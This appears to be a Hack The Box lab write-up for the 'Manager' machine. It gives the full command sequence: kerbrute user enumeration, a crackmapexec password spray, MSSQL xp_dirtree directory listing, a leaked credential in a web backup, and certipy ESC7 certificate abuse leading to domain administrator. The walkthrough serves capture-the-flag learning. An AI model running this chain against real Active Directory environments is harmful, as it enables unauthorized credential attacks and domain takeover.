👤

Manager

 
53/tcp open domain 80/tcp open http 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 1433/tcp open ms-sql-s 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 49667/tcp open unknown 49691/tcp open unknown 49693/tcp open unknown 49695/tcp open unknown 49707/tcp open unknown
53,80,88,135,139,445,464,593,1433,3268,3269,5985,49667,49691,49693,49695,49707
notion image
echo "10.129.42.4 manager.htb dc.manager.htb" >> /etc/hosts
 
notion image
All unaccessible
kerbrute userenum -d manager.htb --dc dc.manager.htb /opt/useful/SecLists/Usernames/xato-net-10-million-usernames.txt >>users
notion image
cat users | grep VALID | awk -F '@' '{print $1}'| awk -F ':' '{print $4}' | tr -d '\t ' >> userlist
crackmapexec smb manager.htb -u userlist -p userlist
notion image
get a smb credential
operator:operator
try to connect mssql
mssqlclient.py -port 1433 manager.htb/operator:operator@manager.htb -windows-auth
notion image
notion image
try to inject commands
EXEc xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
notion image
wget manager.htb/website-backup-27-07-23-old.zip
notion image
notion image
get a credential
raven:R4v3nBe5tD3veloP3r!123
notion image
gain the initial access
Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeMachineAccountPrivilege is enabled
most of the time certify.exe is not present in the server machine ,in my case it was not present
to find vulnerability from certificate templates
./Certify.exe find /vulnarable
notion image
pip3 install certipy-ad
certipy find -vulnerable -stdout -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.100.121
 
there is a glitch with htb server, im trynna reset it later.
notion image
certipy find -vulnerable -stdout -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.134.19
or
./Certify.exe find /vulnarable
again
notion image
search ESC7 exploit, follow
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
notion image
 
certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb'
notion image
certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
notion image
certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 13
notion image
certipy auth -pfx administrator.pfx -username administrator -domain manager.htb -dc-ip 10.129.134.19
notion image
login with the retrieved credential
notion image
got the administrator!
Â